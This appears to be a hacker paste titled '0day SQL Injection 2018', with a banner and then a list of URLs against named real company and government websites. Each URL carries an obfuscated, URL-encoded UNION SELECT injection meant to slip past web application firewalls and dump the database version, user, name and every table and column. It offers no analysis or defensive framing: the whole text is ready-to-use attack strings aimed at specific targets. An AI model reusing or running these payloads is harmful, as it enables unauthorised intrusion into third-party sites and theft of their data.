0day SQL Injection 2018 by Dutchm@n
0day SQL Injection 2018 by Dutchm@n
## ##
## # ## ## ## # ## ## ## # # ## # #
## # ##
## # ## ## ## # ## ## ## # # ## # #
## # ##
## # ## ## ## # ######### ## # ## #######
## # ##
## # ## ## ## # ## ## ## ## # #
## # ##
###### ##### ## ###### ## ## ## ## # #
## ##
#0_day_sql_injection
http://www.impexpedia.com/category.php?IndustryID=-29%20/*!50000Union*/%20Select
%201,2,concat/*!%28unhex%28hex%28concat/*!
%280x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c627
23e3c62723e,unhex%28hex%28concat/*!
%280x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e74
72306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723
d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f
6e743e3c2f63656e7465723e3c2f623e
%29%29%29,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c20566572
73696f6e203a3a20,version
%28%29,0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,
@d:=database%28%29,0x3c62723e44617461626173652055736572203a3a20,user%28%29,%28/*!
12345selEcT*/%28@x%29/*!from*/%28/*!12345selEcT*/
%28@x:=0x00%29,%28@r:=0%29,%28@running_number:=0%29,%28@tbl:=0x00%29,%28/*!
12345selEcT*/%280%29%20from%28information_schema./**/columns%29where
%28table_schema=database%28%29%29%20and%280x00%29in%28@x:=Concat/*!%28@x,
%200x3c62723e,%20if%28%20%28@tbl!=table_name%29,%20Concat/*!
%280x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420
636f6c6f723d626c61636b3e,LPAD%28@r:=@r
%2b1,%202,%200x30%29,0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f
723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e2
8,database%28%29,0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e
%29,%200x00%29,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD
%28@running_number:=@running_number
%2b1,3,0x30%29,0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_na
me,0x3c2f666f6e743e%29%29%29%29x%29%29%29%29%29*/--+-&Industry=Sports%20&
%20Entertainment
http://www.tradeco.biz/category.php?IndustryID=97%20Union%20Select
%201,2,%28Select+export_set%285,@:=0,%28select+count%28*%29from
%28information_schema.columns%29where@:=export_set%285,export_set
%285,@,table_name,0x3c6c693e,2%29,column_name,0xa3a,2%29%29,@,2%29%29--%20-
&Industry=Food%20stuff
http://www.dealmachines.com/category.php?IndustryID=-218%20Union%20Select
%201,2,concat/*!%28unhex%28hex%28concat/*!
%280x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c627
23e3c62723e,unhex%28hex%28concat/*!
%280x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e74
72306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723
d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f
6e743e3c2f63656e7465723e3c2f623e
%29%29%29,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c20566572
73696f6e203a3a20,version
%28%29,0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,
@d:=database%28%29,0x3c62723e44617461626173652055736572203a3a20,user%28%29,%28/*!
12345selEcT*/%28@x%29/*!from*/%28/*!12345selEcT*/
%28@x:=0x00%29,%28@r:=0%29,%28@running_number:=0%29,%28@tbl:=0x00%29,%28/*!
12345selEcT*/%280%29%20from%28information_schema./**/columns%29where
%28table_schema=database%28%29%29%20and%280x00%29in%28@x:=Concat/*!%28@x,
%200x3c62723e,%20if%28%20%28@tbl!=table_name%29,%20Concat/*!
%280x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420
636f6c6f723d626c61636b3e,LPAD%28@r:=@r
%2b1,%202,%200x30%29,0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f
723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e2
8,database%28%29,0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e
%29,%200x00%29,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD
%28@running_number:=@running_number
%2b1,3,0x30%29,0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_na
me,0x3c2f666f6e743e%29%29%29%29x%29%29%29%29%29*/--%20-&Industry=Welding%20Supplies
http://www.qadarroyal.com/industries-sub-page.php?industryId=-1%27%20/*!
50000Union*/%20Select%201,2,concat/*!%28unhex%28hex%28concat/*!
%280x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c627
23e3c62723e,unhex%28hex%28concat/*!
%280x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e74
72306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723
d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f
6e743e3c2f63656e7465723e3c2f623e
%29%29%29,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c20566572
73696f6e203a3a20,version
%28%29,0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,
@d:=database%28%29,0x3c62723e44617461626173652055736572203a3a20,user%28%29,%28/*!
12345selEcT*/%28@x%29/*!from*/%28/*!12345selEcT*/
%28@x:=0x00%29,%28@r:=0%29,%28@running_number:=0%29,%28@tbl:=0x00%29,%28/*!
12345selEcT*/%280%29%20from%28information_schema./**/columns%29where
%28table_schema=database%28%29%29%20and%280x00%29in%28@x:=Concat/*!%28@x,
%200x3c62723e,%20if%28%20%28@tbl!=table_name%29,%20Concat/*!
%280x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420
636f6c6f723d626c61636b3e,LPAD%28@r:=@r
%2b1,%202,%200x30%29,0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f
723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e2
8,database%28%29,0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e
%29,%200x00%29,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD
%28@running_number:=@running_number
%2b1,3,0x30%29,0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_na
me,0x3c2f666f6e743e%29%29%29%29x
%29%29%29%29%29*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48--%20-
https://www.thewealthnet.com/page_directory.php?industryid=-9%20Union%20Select
%201,2,concat/*!%28unhex%28hex%28concat/*!
%280x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c627
23e3c62723e,unhex%28hex%28concat/*!
%280x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e74
72306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723
d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f
6e743e3c2f63656e7465723e3c2f623e
%29%29%29,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c20566572
73696f6e203a3a20,version
%28%29,0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,
@d:=database%28%29,0x3c62723e44617461626173652055736572203a3a20,user%28%29,%28/*!
12345selEcT*/%28@x%29/*!from*/%28/*!12345selEcT*/
%28@x:=0x00%29,%28@r:=0%29,%28@running_number:=0%29,%28@tbl:=0x00%29,%28/*!
12345selEcT*/%280%29%20from%28information_schema./**/columns%29where
%28table_schema=database%28%29%29%20and%280x00%29in%28@x:=Concat/*!%28@x,
%200x3c62723e,%20if%28%20%28@tbl!=table_name%29,%20Concat/*!
%280x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420
636f6c6f723d626c61636b3e,LPAD%28@r:=@r
%2b1,%202,%200x30%29,0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f
723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e2
8,database%28%29,0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e
%29,%200x00%29,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD
%28@running_number:=@running_number
%2b1,3,0x30%29,0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_na
me,0x3c2f666f6e743e%29%29%29%29x
%29%29%29%29%29*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30,31,32,33,34,35,36,37--%20-&country=&company=&page=53
http://eprivateclient.com/page_directory.php?industryid=-48%20Union%20Select
%201,2,concat/*!%28unhex%28hex%28concat/*!
%280x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c627
23e3c62723e,unhex%28hex%28concat/*!
%280x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e74
72306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723
d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f
6e743e3c2f63656e7465723e3c2f623e
%29%29%29,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c20566572
73696f6e203a3a20,version
%28%29,0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,
@d:=database%28%29,0x3c62723e44617461626173652055736572203a3a20,user%28%29,%28/*!
12345selEcT*/%28@x%29/*!from*/%28/*!12345selEcT*/
%28@x:=0x00%29,%28@r:=0%29,%28@running_number:=0%29,%28@tbl:=0x00%29,%28/*!
12345selEcT*/%280%29%20from%28information_schema./**/columns%29where
%28table_schema=database%28%29%29%20and%280x00%29in%28@x:=Concat/*!%28@x,
%200x3c62723e,%20if%28%20%28@tbl!=table_name%29,%20Concat/*!
%280x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420
636f6c6f723d626c61636b3e,LPAD%28@r:=@r
%2b1,%202,%200x30%29,0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f
723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e2
8,database%28%29,0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e
%29,%200x00%29,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD
%28@running_number:=@running_number
%2b1,3,0x30%29,0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_na
me,0x3c2f666f6e743e%29%29%29%29x
%29%29%29%29%29*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30,31,32,33,34,35,36,37--%20-
http://www.bursaticaret.net/buyers_subcategories.php?IndustryID=-38%20Union
%20Select%201,2,concat/*!%28unhex%28hex%28concat/*!
%280x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c627
23e3c62723e,unhex%28hex%28concat/*!
%280x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e74
72306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723
d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f
6e743e3c2f63656e7465723e3c2f623e
%29%29%29,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c20566572
73696f6e203a3a20,version
%28%29,0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,
@d:=database%28%29,0x3c62723e44617461626173652055736572203a3a20,user%28%29,%28/*!
12345selEcT*/%28@x%29/*!from*/%28/*!12345selEcT*/
%28@x:=0x00%29,%28@r:=0%29,%28@running_number:=0%29,%28@tbl:=0x00%29,%28/*!
12345selEcT*/%280%29%20from%28information_schema./**/columns%29where
%28table_schema=database%28%29%29%20and%280x00%29in%28@x:=Concat/*!%28@x,
%200x3c62723e,%20if%28%20%28@tbl!=table_name%29,%20Concat/*!
%280x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420
636f6c6f723d626c61636b3e,LPAD%28@r:=@r
%2b1,%202,%200x30%29,0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f
723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e2
8,database%28%29,0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e
%29,%200x00%29,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD
%28@running_number:=@running_number
%2b1,3,0x30%29,0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_na
me,0x3c2f666f6e743e%29%29%29%29x%29%29%29%29%29*/--%20-
http://www.bursaticaret.net/buyers_subcategories.php?IndustryID=-38%20Union
%20Select%201,2,concat/*!%28unhex%28hex%28concat/*!
%280x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c627
23e3c62723e,unhex%28hex%28concat/*!
%280x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e74
72306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723
d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f
6e743e3c2f63656e7465723e3c2f623e
%29%29%29,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c20566572
73696f6e203a3a20,version
%28%29,0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,
@d:=database%28%29,0x3c62723e44617461626173652055736572203a3a20,user%28%29,%28/*!
12345selEcT*/%28@x%29/*!from*/%28/*!12345selEcT*/
%28@x:=0x00%29,%28@r:=0%29,%28@running_number:=0%29,%28@tbl:=0x00%29,%28/*!
12345selEcT*/%280%29%20from%28information_schema./**/columns%29where
%28table_schema=database%28%29%29%20and%280x00%29in%28@x:=Concat/*!%28@x,
%200x3c62723e,%20if%28%20%28@tbl!=table_name%29,%20Concat/*!
%280x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420
636f6c6f723d626c61636b3e,LPAD%28@r:=@r
%2b1,%202,%200x30%29,0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f
723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e2
8,database%28%29,0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e
%29,%200x00%29,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD
%28@running_number:=@running_number
%2b1,3,0x30%29,0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_na
me,0x3c2f666f6e743e%29%29%29%29x%29%29%29%29%29*/--%20-
http://www.gwwlogistics.com/industrysolutions.php?industryid=-7%20+UNION%28SELECT
%281%29,%28concat/*!%28unhex%28hex%28concat/*!
%280x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c627
23e3c62723e,unhex%28hex%28concat/*!
%280x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e74
72306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723
d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f
6e743e3c2f63656e7465723e3c2f623e
%29%29%29,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c20566572
73696f6e203a3a20,version
%28%29,0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,
@d:=database%28%29,0x3c62723e44617461626173652055736572203a3a20,user%28%29,%28/*!
12345selEcT*/%28@x%29/*!from*/%28/*!12345selEcT*/
%28@x:=0x00%29,%28@r:=0%29,%28@running_number:=0%29,%28@tbl:=0x00%29,%28/*!
12345selEcT*/%280%29%20from%28information_schema./**/columns%29where
%28table_schema=database%28%29%29%20and%280x00%29in%28@x:=Concat/*!%28@x,
%200x3c62723e,%20if%28%20%28@tbl!=table_name%29,%20Concat/*!
%280x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420
636f6c6f723d626c61636b3e,LPAD%28@r:=@r
%2b1,%202,%200x30%29,0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f
723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e2
8,database%28%29,0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e
%29,%200x00%29,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD
%28@running_number:=@running_number
%2b1,3,0x30%29,0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_na
me,0x3c2f666f6e743e%29%29%29%29x%29%29%29%29%29*/
%29,%283%29,%284%29,%285%29,%286%29,%287%29,%288%29,%289%29,%2810%29,%2811%29%29--
%20-
http://intelligence.masci.or.th/intelligence/standardregulation_list_detail.php?
IndustryID=2&StandardregulationID=-30%20Union%23%0ASelect%201,%28SELECT%28@x%29FROM
%28SELECT%28@x:=0x00%29,%28@NR:=0%29,%28SELECT%280%29FROM
%28INFORMATION_SCHEMA.TABLES%29WHERE%28TABLE_SCHEMA!
=0x696e666f726d6174696f6e5f736368656d61%29AND%280x00%29IN%28@x:=CONCAT%28@x,LPAD
%28@NR:=@NR%2b1,4,0x30%29,0x3a20,table_name,0x3c62723e%29%29%29%29x
%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
,32--%20-